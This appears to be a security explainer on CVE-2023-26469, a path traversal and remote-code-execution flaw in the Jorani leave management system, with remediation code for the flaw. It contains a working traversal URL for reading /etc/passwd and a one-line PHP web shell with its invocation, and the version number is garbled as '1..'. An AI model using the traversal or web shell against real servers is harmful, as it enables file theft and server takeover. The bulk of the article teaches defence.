CVE-2023-26469 - Path Traversal & Remote Code Execution in Jorani 1..
In early 2023, researchers disclosed CVE-2023-26469, a critical vulnerability in Jorani 1.., a popular open-source leave management system. The flaw lets an attacker use path traversal to read files the web server process can reach and, where file uploads are also unrestricted, to run code on the server. This article explains what that means, walks through how the exploit works, and provides annotated code snippets so you can follow the details.
What is Path Traversal?
Path traversal is a vulnerability in which missing or inadequate input validation lets an attacker reach directories and files outside the intended base directory. For instance, by submitting ../../../etc/passwd where a plain file name is expected, an attacker may retrieve the system password file on a Unix server; the same trick reaches configuration files, source code and anything else the web server process is allowed to read.
How Jorani 1.. is Vulnerable
Jorani's file handling features, such as uploading and downloading leave-request attachments, do not properly sanitize user-supplied file paths. When a user requests a file, the application concatenates the user-supplied name onto a base directory without normalising it and without checking that the result still lies inside that directory, so ../ sequences in the name simply walk out of it.
Suppose the download code looks like this (an illustration of the vulnerable pattern, not Jorani's actual source):

```php
<?php
// Illustrative vulnerable pattern: the file name comes straight from the
// query string and is glued onto the base directory with no normalisation
// and no check that the result is still under /uploads/.
$attachment = $_GET['file'];
$file_path = "/var/www/jorani/uploads/" . $attachment;
if (file_exists($file_path)) {   // "../../../../etc/passwd" exists, so this passes
    readfile($file_path);        // and the file's contents go into the response
}
```
Here $_GET['file'] is used as-is, so requesting ?file=../../../../etc/passwd produces the path /var/www/jorani/uploads/../../../../etc/passwd, which the operating system resolves to /etc/passwd; file_exists() returns true and readfile() sends the server's password file back to the attacker.
Manipulate the File Parameter
- Put ../../../../etc/passwd (or another sensitive path) in the file parameter of the download URL:

```
https://victim.com/jorani/index.php/download/file?file=../../../../etc/passwd
```

- If the request succeeds, the response body is the contents of /etc/passwd. In practice /etc/passwd is only the proof of concept; the application's configuration files, which hold database credentials, are the more valuable target.
Upload a Web Shell
If file uploads are enabled and the upload handler does not restrict file types, an attacker can upload a PHP file such as shell.php as an attachment.
- The file is then reached at /var/www/jorani/uploads/shell.php. Note that reading it through the traversal in the download handler only returns its source; for the code to run, the uploads directory must be served by the web server with PHP execution enabled, which is the case in the request shown below.

Create a file called shell.php:

```php
<?php
// Minimal web shell: runs the cmd query parameter and echoes its output.
system($_GET['cmd']);
```

Upload it through the application, then call it with:

```
https://victim.com/jorani/uploads/shell.php?cmd=whoami
```

The attacker can now run arbitrary commands on the server as the web server user.
Impact
- Sensitive Data Exposure: Attackers can read any file readable by the web server process, such as the application's configuration files, database credentials and application source code.
- Remote Code Execution: Where uploads are unrestricted and the uploads directory is served with PHP execution enabled, a malicious PHP file can be uploaded and executed, giving the attacker control of the server with the web server's privileges.
Remediation
If you use Jorani 1.., update to the latest version immediately. Patch notes and updated versions are available on:
- Jorani GitHub Releases
- Official CVE Report
- Full Disclosure – Exploit DB *(if available)*
Here's one way to prevent path traversal in PHP:

```php
$filename = basename($_GET['file']); // strips every directory component, so ../../ is gone
$file_path = "/var/www/jorani/uploads/" . $filename;
```

basename() is a good first cut because it reduces the input to a single path component, but on its own it is not a complete fix: it does not confirm that the file is one the application actually stored, and it does not help if a symlink inside the uploads directory points elsewhere. Combine it with an allowlist of expected names or extensions and a realpath() check that the resolved path still starts with the base directory, and restrict uploads so that executable files are never stored in a web-served location.
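The checks just described, assembled into a hardened download and upload pair. This is an added example written for this article, not code from the Jorani project; the attachment directory, the function names, the extension allowlist and the random naming scheme are all assumptions. It goes a step beyond basename(): the stored file name is generated by the server, so the download handler can insist on an exact shape and then confirm with realpath() that the resolved file is still inside the directory, while the upload handler rejects shell.php on its extension and never lets the client choose the stored name.

```php
<?php
declare(strict_types=1);
// Added example for this article, not Jorani's code. All paths, names and
// the allowlist below are assumptions. Attachments live OUTSIDE the web
// root and are reached only through attachment_download(), never by URL,
// so an uploaded file can never be executed by the web server.
const ATTACHMENT_DIR = '/var/lib/jorani/attachments';   // assumed
const ALLOWED_EXT    = ['pdf', 'png', 'jpg', 'jpeg', 'txt'];

/**
 * Resolve a stored attachment name to an absolute path under $baseDir, or
 * return null. Any one of the three checks stops ../../../../etc/passwd.
 */
function resolve_attachment(string $baseDir, string $name): ?string
{
    // 1. Stored names are produced by store_attachment(), so the legitimate
    //    set is tiny: 32 hex characters, a dot, an allowed extension.
    //    Slashes, backslashes, "..", NUL bytes and trailing newlines all
    //    fail here before the filesystem is touched.
    $shape = '/\A[0-9a-f]{32}\.(' . implode('|', ALLOWED_EXT) . ')\z/';
    if (preg_match($shape, $name) !== 1) {
        return null;
    }
    // 2. Canonicalise: realpath() resolves symlinks and dot segments and
    //    returns false if the file does not exist.
    $base = realpath($baseDir);
    $full = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $full === false) {
        return null;
    }
    // 3. The canonical file must still sit under the canonical base; a
    //    symlink planted in the directory and pointing elsewhere fails here.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($full, $prefix, strlen($prefix)) === 0 ? $full : null;
}

/**
 * Store one entry of $_FILES under a server-generated name. Returns the
 * stored name (to be kept in the database with the original name) or null.
 */
function store_attachment(string $baseDir, array $upload): ?string
{
    if (($upload['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($upload['tmp_name'])) {
        return null;
    }
    // The client's file name contributes only its extension, and only if
    // that extension is allowlisted: shell.php stops here.
    $ext = strtolower(pathinfo($upload['name'], PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return null;
    }
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    $target = $baseDir . DIRECTORY_SEPARATOR . $stored;
    return move_uploaded_file($upload['tmp_name'], $target) ? $stored : null;
}

/** Serve a stored attachment as a download under its original name. */
function attachment_download(string $storedName, string $originalName): void
{
    $path = resolve_attachment(ATTACHMENT_DIR, $storedName);
    if ($path === null) {
        http_response_code(404);
        exit;
    }
    // Force a download and forbid sniffing so a stored HTML or SVG file
    // cannot run script in the requesting user's browser either.
    header('Content-Type: application/octet-stream');
    header('X-Content-Type-Options: nosniff');
    header("Content-Disposition: attachment; filename*=UTF-8''"
        . rawurlencode($originalName));
    header('Content-Length: ' . (string) filesize($path));
    readfile($path);
}

// Self-check from the command line: constructed inputs in a temp directory.
if (PHP_SAPI === 'cli') {
    $dir  = sys_get_temp_dir() . '/att_' . bin2hex(random_bytes(4));
    mkdir($dir, 0700);
    $good = str_repeat('ab', 16) . '.pdf';
    touch("$dir/$good");
    $cases = [
        $good                         => true,
        '../../../../etc/passwd'      => false,   // the traversal above
        'shell.php'                   => false,   // wrong shape, bad extension
        str_repeat('ab', 16) . '.php' => false,   // right shape, bad extension
        "$good\0.txt"                 => false,   // NUL-byte truncation trick
        str_repeat('cd', 16) . '.pdf' => false,   // well-formed but absent
    ];
    foreach ($cases as $input => $expected) {
        $accepted = resolve_attachment($dir, $input) !== null;
        printf("%-5s %s\n", $accepted === $expected ? 'ok' : 'WRONG',
            addcslashes($input, "\0"));
    }
    unlink("$dir/$good");
    rmdir($dir);
}
```

Run from the command line, the self-check exercises resolve_attachment() against the constructed inputs and prints ok for each one that is accepted or rejected as intended. In the application, attachment_download() is what the download route would call, ideally with the stored name looked up from the database by attachment ID rather than taken from the URL at all. Keeping the directory outside the web root is what removes the upload-then-execute path entirely; if it has to live under the document root, additionally configure the web server not to execute PHP from it.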
References
- CVE-2023-26469 Summary
- Jorani Project on GitHub
- OWASP Path Traversal Cheat Sheet
Conclusion
*CVE-2023-26469 is a serious vulnerability affecting Jorani 1.., letting attackers read files and even run code on your server.* If you’re still using this version, patch it now. Always sanitize input and follow secure coding practices.
Timeline
Published on: 08/17/2023 19:15:00 UTC
Last modified on: 08/23/2023 16:00:00 UTC